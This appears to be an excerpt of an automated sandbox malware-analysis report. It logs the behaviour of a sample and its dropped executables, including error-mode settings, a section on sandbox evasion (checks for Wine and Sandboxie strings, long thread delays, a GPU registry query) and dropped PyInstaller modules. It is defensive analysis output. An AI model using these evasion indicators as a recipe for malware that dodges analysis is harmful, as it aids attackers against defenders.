            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeCode function: 13_2_00007FF6AAE25830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,13_2_00007FF6AAE25830
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
            Source: file.exe, 00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: file.exe, 00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1DC8B560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1DCA35B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5926Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3807Jump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_socket.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_bz2.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_wmi.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28002\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61082\_asyncio.pydJump to dropped file
